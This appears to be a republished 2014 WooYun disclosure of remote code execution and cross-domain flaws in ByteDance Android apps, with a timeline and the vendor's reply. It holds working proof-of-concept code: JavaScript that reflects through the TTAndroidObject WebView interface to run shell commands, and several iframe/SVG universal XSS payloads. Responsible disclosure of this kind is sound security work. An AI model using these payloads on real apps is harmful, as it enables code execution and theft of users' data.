字节跳动旗下N多产品安卓客户端远程代码执、跨域漏洞等

2015年6月6日18:52:39评论349 views字数 214阅读0分42秒阅读模式

摘要

2014-09-02：细节已通知厂商并且等待厂商处理中
2014-09-05：厂商已经确认，细节仅向厂商公开
2014-09-08：细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航、无声信息）
2014-10-30：细节向核心白帽子及相关领域专家公开
2014-11-09：细节向普通白帽子公开
2014-11-19：细节向实习白帽子公开
2014-12-01：细节向公众公开

漏洞概要关注数(3) 关注此漏洞

缺陷编号： WooYun-2014-74778

漏洞标题：字节跳动旗下N多产品安卓客户端远程代码执、跨域漏洞等

漏洞作者： DuFanG

提交时间： 2014-09-02 15:54

公开时间： 2014-12-01 15:56

漏洞类型：远程代码执行

危害等级：高

自评Rank： 20

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：远程代码执行

2人收藏

漏洞详情

披露状态：

简要描述：

听说会有礼物~~~我就来了~~~礼物~、、、

详细说明：

漏洞一命令执行

之前有人提交一次你们命令执行可是在这次升级中你们又忽略了检测, 结果导致又出现该漏洞。

详情亲看 http://**.**.**.**/bugs/wooyun-2010-061543

这次测试的是3.6.0版本

如图

如上图所示存在漏洞接口为 ; TTAndroidObject

构造POC如下(感谢mango提供代码):

code 区域

<html>
 
 <head>
 
 <meta charset="utf-8">
 
 
 
 <script type="text/javascript">
 
 if(window.TTAndroidObject){
 
     try{
 
         TTAndroidObject.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec (["/system/bin/sh","-c","echo 'test' > /storage/emulated/0/1.txt"]);
 
         alert('good job');
 
     }catch(e){
 
         alert(e);
 
     }
 
 }
 
 </script>
 
 
 
 <title>app test</title>
 
 
 
 </body>
 
 </html>

成功执行命令会在目录下生成1.txt 路径的话因为我的是红米你可以自己改。

漏洞二: 各种跨域漏洞(只拿今日头条测试,你们的今日娱乐APP也存在)

code 区域

<iframe name="m" src="http://zone.**.**.**.**" onload="window.open('/u0000javascript:alert(document.domain)','m')" >

含有上面代码内容打开网页就会跨域

code 区域

<body>
 <script>
 i = document.body.appendChild(document.createElement("iframe"));
 i.src = "http://**.**.**.**";
 
 i.onload = function()
 {
 document.documentURI = "javascript://**.**.**.**/%0D%0Aalert('OH HAI ' + location)";
 i.contentWindow.location = "";
 }
 </script>
 </body>

这个也是如此~~~

code 区域

test.html代码：
 
 <head>
 
 <script>
 
 main = function()
 
 {
 
     specialFrame = document.body.appendChild(document.createElement("iframe"));
 
 
 
     document.adoptNode(specialFrame);
 
     document.implementation.createHTMLDocument().adoptNode(specialFrame);
 
 
 
     specialFrame.contentWindow.location = "http://**.**.**.**/";
 
 
 
     interval1 = setInterval(function() {
 
         if (specialFrame.contentDocument)
 
             return;
 
         clearInterval(interval1);
 
 
 
         specialFrame.src = "javascript:alert(document.body.innerHTML)";
 
 
 
         uxssFrame = document.body.appendChild(document.createElement("iframe"));
 
         uxssFrame.src = "test.svg";
 
     }, 100);
 
 }
 
 </script>
 
 </head>
 
 <body onload="main()"></body>
 
 
 
 svg代码：
 
 <svg xmlns="http://**.**.**.**/2000/svg">
 
 <script>
 
 svg = document.documentElement;
 
 frame = svg.appendChild(document.createElementNS("http://**.**.**.**/1999/xhtml", "iframe"));
 
 frame.contentWindow.onunload = function() {
 
     svg.appendChild(top.specialFrame);
 
 }
 
 </script> 
 
 <element param="1" param="2"/>
 
 </svg>

两个代码~~~ 可直接跨域。

漏洞证明：

友情提示一下哦~

贵公司的内涵段子内涵社区的安卓客户端都存在命令执行漏洞且漏洞接口为:TTAndroidObject 下图为证

贵公司的今日头彩APP 存在命令执行漏洞且漏洞接口为:baseWebView 请看下图

修复方案：

安全这个东西很重要~~希望贵公司尽快修复~ 而且要周期性的检查一遍哦~~~ 最后求礼物~~~

版权声明：转载请注明来源 DuFanG@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2014-09-05 17:56

厂商回复：

某手机厂商的系统版本中，该接口漏洞理应已经修复，但实际未修复。字节跳动旗下产品在下一轮版本更新中会对该厂商的系统做对应处理。同时会通知该厂商修复该漏洞。

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):

登陆后才能进行评分

100%

漏洞概要 关注数(3) 关注此漏洞

缺陷编号： WooYun-2014-74778

漏洞标题： 字节跳动旗下N多产品安卓客户端远程代码执、 跨域漏洞等

相关厂商： 字节跳动

漏洞作者： DuFanG

提交时间： 2014-09-02 15:54

公开时间： 2014-12-01 15:56

漏洞类型： 远程代码执行

危害等级： 高

自评Rank： 20

漏洞状态： 厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 远程代码执行

2人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 DuFanG@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(少于3人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(3) 关注此漏洞

漏洞标题：字节跳动旗下N多产品安卓客户端远程代码执、跨域漏洞等

相关厂商：字节跳动

漏洞类型：远程代码执行

危害等级：高

漏洞状态：厂商已经确认

Tags标签：远程代码执行

漏洞评价(少于3人评价):

登陆后才能进行评分